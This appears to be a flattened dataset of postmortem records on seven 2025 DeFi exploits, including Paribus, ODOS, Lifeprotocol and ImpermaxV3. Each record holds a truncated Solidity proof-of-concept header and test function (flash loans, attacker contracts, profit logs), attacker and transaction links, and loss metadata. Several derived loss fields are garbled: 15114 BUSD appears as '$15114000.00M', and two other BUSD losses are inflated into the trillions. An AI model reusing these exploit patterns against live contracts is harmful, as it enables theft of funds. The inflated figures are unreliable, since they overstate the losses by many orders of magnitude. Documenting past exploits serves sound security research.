// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~86k // Attacker : https://arbiscan.io/address/0x56190CAC88b8D4b5D5Ed668ef81828913932e7Ed // Attack Contract : https://arbiscan.io/tx/0x43aa42d2f11afe42832a9619bc8066dfb8...
exploit_poc
Paribus
2025-01
Paribus_exp.sol
flash_loan
abff26ba6e9c4178
2026-01-07T10:59:16.544613
postmortems
arbitrum
null
~86k
86,000
https://arbiscan.io/address/0x56190CAC88b8D4b5D5Ed668ef81828913932e7Ed
https://arbiscan.io/tx/0x43aa42d2f11afe42832a9619bc8066dfb83a921798b91eaf9d0345dd27dcfb06
https://arbiscan.io/address/0xaffd437801434643b734d0b2853654876f66f7d7
https://arbiscan.io/tx/0xf5e753d3da60db214f2261343c1e1bc46e674d2fa4b7a953eaf3c52123aeebd2
https://bitfinding.com/blog/paribus-hack-interception
https://x.com/BitFinding/status/1882880682512527516
true
true
true
medium
~86k
flash-loan
function testExploit() public { emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18); emit log_named_decimal_uint("Exploiter USDT balance before attack", USDT.balanceOf(address(this)), 6); emit log_named_decimal_uint("Exploiter ARB_DAO balance before atta...
true
~86k
https://arbiscan.io/address/0x56190CAC88b8D4b5D5Ed668ef81828913932e7Ed
https://arbiscan.io/tx/0x43aa42d2f11afe42832a9619bc8066dfb83a921798b91eaf9d0345dd27dcfb06
https://arbiscan.io/address/0xaffd437801434643b734d0b2853654876f66f7d7
https://arbiscan.io/tx/0xf5e753d3da60db214f2261343c1e1bc46e674d2fa4b7a953eaf3c52123aeebd2
https://bitfinding.com/blog/paribus-hack-interception
https://x.com/BitFinding/status/1882880682512527516
$86.0K
10
high
Paribus Exploit (2025-01)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~50k // Attacker : https://basescan.org/address/0x4015d786e33c1842c3e4d27792098e4a3612fc0e // Attack Contract : https://basescan.org/address/0x22a7da241a39f189a8aec269a6...
exploit_poc
ODOS
2025-01
ODOS_exp.sol
null
d323862e91c280ec
2026-01-07T10:59:16.544678
postmortems
base
25,431,001
~50k
50,000
https://basescan.org/address/0x4015d786e33c1842c3e4d27792098e4a3612fc0e
https://basescan.org/address/0x22a7da241a39f189a8aec269a6f11a238b6086fc
https://basescan.org/address/0xb6333e994fd02a9255e794c177efbdeb1fe779c7
https://basescan.org/tx/0xd10faa5b33ddb501b1dc6430896c966048271f2510ff9ed681dd6d510c5df9f6
null
https://x.com/Phalcon_xyz/status/1882630151583981787
true
true
false
medium
~50k
unknown
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker USDC balance before exploit", USDCInstance.balanceOf(address(this)), 6 ); uint256 victimUSDCBalance = USDCInstance.balanceOf(address(odosLimitOrderRouterInstance)); bytes ...
true
~50k
https://basescan.org/address/0x4015d786e33c1842c3e4d27792098e4a3612fc0e
https://basescan.org/address/0x22a7da241a39f189a8aec269a6f11a238b6086fc
https://basescan.org/address/0xb6333e994fd02a9255e794c177efbdeb1fe779c7
https://basescan.org/tx/0xd10faa5b33ddb501b1dc6430896c966048271f2510ff9ed681dd6d510c5df9f6
https://x.com/Phalcon_xyz/status/1882630151583981787
$50.0K
7.22
medium
ODOS Exploit (2025-01)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 15114 BUSD // Attacker : https://bscscan.com/address/0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32 // Attack Contract : https://bscscan.com/address/0xF6Cee497DFE95A04FAa26F31...
exploit_poc
Lifeprotocol
2025-04
Lifeprotocol_exp.sol
flash_loan
a8b6ee30aa04031b
2026-01-07T10:59:16.544722
postmortems
bsc
48,703,546
15114 BUSD
15,114,000,000,000
https://bscscan.com/address/0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32
https://bscscan.com/address/0xF6Cee497DFE95A04FAa26F3138F9244a4d92f942
https://bscscan.com/address/0x42e2773508e2ae8ff9434bea599812e28449e2cd
https://bscscan.com/tx/0x487fb71e3d2574e747c67a45971ec3966d275d0069d4f9da6d43901401f8f3c0
null
null
true
true
true
critical
15114 BUSD
flash-loan
function testExploit() public { IFS(dpp).flashLoan(0, quoteAmount, address(this), abi.encodePacked(uint256(1))); console2.log("Profit:", IFS(busd).balanceOf(address(this)) / 1e18, 'BUSD'); }
true
15114 BUSD
https://bscscan.com/address/0x3026C464d3Bd6Ef0CeD0D49e80f171b58176Ce32
https://bscscan.com/address/0xF6Cee497DFE95A04FAa26F3138F9244a4d92f942
https://bscscan.com/address/0x42e2773508e2ae8ff9434bea599812e28449e2cd
https://bscscan.com/tx/0x487fb71e3d2574e747c67a45971ec3966d275d0069d4f9da6d43901401f8f3c0
$15114000.00M
8.16
high
Lifeprotocol Exploit (2025-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 15261.68240413121964707 BUSD // Original Attacker : https://bscscan.com/address/0x00000000b7da455fed1553c4639c4b29983d8538 // Attack Contract(Main) : https://bscscan.com/a...
exploit_poc
YBToken
2025-04
YBToken_exp.sol
null
500e3aaa947c8cd8
2026-01-07T10:59:16.544773
postmortems
bsc
48,415,276
15261.68240413121964707 BUSD
15,261,682,404,131.219
https://bscscan.com/address/0x00000000b7da455fed1553c4639c4b29983d8538
null
https://bscscan.com/address/0x113F16A3341D32c4a38Ca207Ec6ab109cF63e434
https://bscscan.com/tx/0xe1e7fa81c3761e2698aa83e084f7dd4a1ff907bcfc4a612d54d92175d4e8a28b
null
null
true
false
false
critical
15261.68240413121964707 BUSD
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attC = new AttackerC(); attC.attack(); console2.log("Profit:", IERC20(BUSD).balanceOf(attacker) / 1e18, 'BUSD'); } } contract AttackerC { uint256 loanAmount = 19200000000000000000000; // Magic number u...
true
15261.68240413121964707 BUSD
https://bscscan.com/address/0x00000000b7da455fed1553c4639c4b29983d8538
https://bscscan.com/address/0x113F16A3341D32c4a38Ca207Ec6ab109cF63e434
https://bscscan.com/tx/0xe1e7fa81c3761e2698aa83e084f7dd4a1ff907bcfc4a612d54d92175d4e8a28b
$15261682.40M
8.09
high
YBToken Exploit (2025-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 19025.9193312786235214 BUSD // Original Attacker : https://bscscan.com/address/0xbda2a27cdb2ffd4258f3b1ed664ed0f28f9e0fc3 // Attack Contract : https://bscscan.com/address/...
exploit_poc
BTNFT
2025-04
BTNFT_exp.sol
null
5ab03187e8f7cd49
2026-01-07T10:59:16.544825
postmortems
bsc
48,472,356
19025.9193312786235214 BUSD
19,025,919,331,278.62
https://bscscan.com/address/0xbda2a27cdb2ffd4258f3b1ed664ed0f28f9e0fc3
https://bscscan.com/address/0x7A4D144307d2DFA2885887368E4cd4678dB3c27a
https://bscscan.com/address/0x0FC91B6Fea2E7A827a8C99C91101ed36c638521B#code
null
null
null
true
false
false
critical
19025.9193312786235214 BUSD
unknown
function testPoC() public { vm.startPrank(attacker); AttackerC attC = new AttackerC(); attC.attackTx1(); attC.attackTx2(); emit log_named_decimal_uint("Profit in BUSD", IERC20(BUSD).balanceOf(attacker), 18); } } contract AttackerC {
true
19025.9193312786235214 BUSD
https://bscscan.com/address/0xbda2a27cdb2ffd4258f3b1ed664ed0f28f9e0fc3
https://bscscan.com/address/0x7A4D144307d2DFA2885887368E4cd4678dB3c27a
https://bscscan.com/address/0x0FC91B6Fea2E7A827a8C99C91101ed36c638521B#code
$19025919.33M
6.27
medium
BTNFT Exploit (2025-04)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~300k // 26th April, 2025, at 10:43 UTC // Attacker : https://basescan.org/address/0xe3223f7e3343c2c8079f261d59ee1e513086c7c3 // Attack Contract : https://basescan.org/add...
exploit_poc
ImpermaxV3
2025-04
ImpermaxV3_exp.sol
flash_loan
ba5c330f5c51b6c1
2026-01-07T10:59:16.544875
postmortems
base
29,437,439
~300k
300,000
https://basescan.org/address/0xe3223f7e3343c2c8079f261d59ee1e513086c7c3
https://basescan.org/address/0x98e938899902217465f17cf0b76d12b3dca8ce1b
https://basescan.org/address/0x5d93f216f17c225a8b5ffa34e74b7133436281ee
https://basescan.org/tx/0xde903046b5cdf27a5391b771f41e645e9cc670b649f7b87b1524fc4076f45983
null
null
true
false
true
high
~300k
flash-loan
function testExploit() public { IFS(Morpho).flashLoan(WETH_address, borrowWETH_amount, abi.encodePacked(uint256(1))); console2.log("WETH balance: ", IFS(WETH_address).balanceOf(address(this))); console2.log("USDC balance: ", IFS(USDC_address).balanceOf(address(this))); } bool private in...
true
~300k
https://basescan.org/address/0xe3223f7e3343c2c8079f261d59ee1e513086c7c3
https://basescan.org/address/0x98e938899902217465f17cf0b76d12b3dca8ce1b
https://basescan.org/address/0x5d93f216f17c225a8b5ffa34e74b7133436281ee
https://basescan.org/tx/0xde903046b5cdf27a5391b771f41e645e9cc670b649f7b87b1524fc4076f45983
$300.0K
10
high
ImpermaxV3 Exploit (2025-04)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ ($62.3K) // Attacker : https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68 // Attack Contract : https://basescan.org/address/0x780e5cb8de79846f35541b700...
exploit_poc
Unverified_6077
2025-04
Unverified_6077_exp.sol
null
0c32819ecc29bf6e
2026-01-07T10:59:16.544956
postmortems
base
null
~ ($62.3K)
62,300
https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68
https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68
https://basescan.org/address/0x607742a2adea4037020e11bb67cb98e289e3ec7d
https://basescan.org/tx/0x1a6002d8aee205dff67cb2cdaf60569721655857d49ffe2ce81e10fde8c45946
null
https://x.com/TenArmorAlert/status/1910662533607796887
true
true
false
medium
~ ($62.3K)
unknown
function testExploit() public { AttackContract attackContract = new AttackContract(); attackContract.start(); AttackContract2 attackContract2 = new AttackContract2(); attackContract2.start(); emit log_named_decimal_uint("WETH", TokenHelper.getTokenBalance(WETH_ADDR, address(this...
true
~ ($62.3K)
https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68
https://basescan.org/address/0x780e5cb8de79846f35541b700637057c9ddded68
https://basescan.org/address/0x607742a2adea4037020e11bb67cb98e289e3ec7d
https://basescan.org/tx/0x1a6002d8aee205dff67cb2cdaf60569721655857d49ffe2ce81e10fde8c45946
https://x.com/TenArmorAlert/status/1910662533607796887
$62.3K
7.69
medium
Unverified_6077 Exploit (2025-04)
true
true
true
false